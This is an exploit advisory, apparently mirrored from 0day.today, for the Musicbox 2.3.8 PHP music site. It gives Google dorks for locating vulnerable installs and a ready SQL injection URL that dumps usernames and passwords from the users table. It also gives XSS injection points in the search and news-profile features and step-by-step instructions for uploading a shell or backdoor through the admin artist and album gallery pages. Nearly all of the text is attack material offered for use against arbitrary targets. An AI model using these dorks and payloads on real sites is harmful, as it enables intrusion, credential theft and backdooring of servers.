Musicbox 2.3.8 - Multiple Vulnerabilities

2013-08-27T00:00:00
ID 1337DAY-ID-21164
Type zdt
Reporter DevilScreaM
Modified 2013-08-27T00:00:00

Description

Musicbox version 2.3.8 suffers from cross site scripting, remote shell upload, and remote SQL injection vulnerabilities.

                                        
                                            #Exploit Title      : Musicbox 2.3.8 Multiple Vulnerabilities
#Author         : DevilScreaM
#Date           : 25/08/2013
#Category       : Web Applications
#Vendor                 : http://www.musicboxv2.com/
#Version        : 1.0 - 2.3.8
 
#Dork      
intext:Musicbox Version
intext:Musicbox Version 2.3.8 © 2008
inurl:genre_albums.php?id=
 
#Vulnerability      : SQL Injection Vulnerability, XSS Vulnerability, Shell Upload Vulnerability
#Tested On      : Windows 7 32 Bit (Mozila & Chrome)
#Greetz                 : Newbie-Security.or.id
  
 
SQL Injection Vulnerability
 
http://site-target/genre_albums.php?id=[SQLI]
 
Example
http://site-target/genre_albums.php?id=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--
 
==========================================================================================
 
Cross site scripting / XSS Vulnerability
 
*Search
 
1. Go To Fiture Search
 
2. Input your Cross Site Scripting, Example "<h1>Tested by DevilScreaM</h1>" , Click Search
 
3. See Result
 
or See with URL
 
http://site-target/index.php?in=song&term=[Cross site scripting/XSS]&action=search&start=0
 
Example
 
http://site-target/index.php?in=song&term=<h1>Tested by DevilScreaM</h1>&action=search&start=0
 
 
========================================================================================
 
*News Profile
 
1. Register To Website or go to link http://site-target/register.php
 
2. Login to Website
 
3. Go to Menu [ My News ]
 
4. At News Heading input your XSS, Example <h1>Tested by DevilScreaM</h1>
 
And at Detials input your XSS or Text
 
See your XSS at http://site-target/member.php?uname=[YOUR_USERNAME]
 
Example
 
http://server/musicbox/member.php?uname=devilscream
 
 
==========================================================================================
 
Shell Upload Vulnerability
 
*Artist Galery
 
1. Go to Admin Page, And Login
 
2. Go to Upload Artist Image or Go to Link
 
http://site-target/admin/adminpanel.php?action=artistgallery
 
3. Select Your Shell/Backdoor , And Click Submit
 
4. Result Upload At
 
http://site-target/artist_gallery/Your_Backdoor.php
 
 
============================================================================================
 
*Album Galery
 
1. Go to Admin Page, And Login
 
2. Go to Upload Album Image or Go to Link
 
http://site-target/admin/adminpanel.php?action=albumgallery
 
3. Select Option, Example Option "All Album", And Click Submit
 
3. Select Your Shell/Backdoor , And Click Submit
 
4. Result Upload At
 
http://site-target/album_gallery/Your_Backdoor.php
 
 
==========================================================================================

#  0day.today [2018-04-05]  #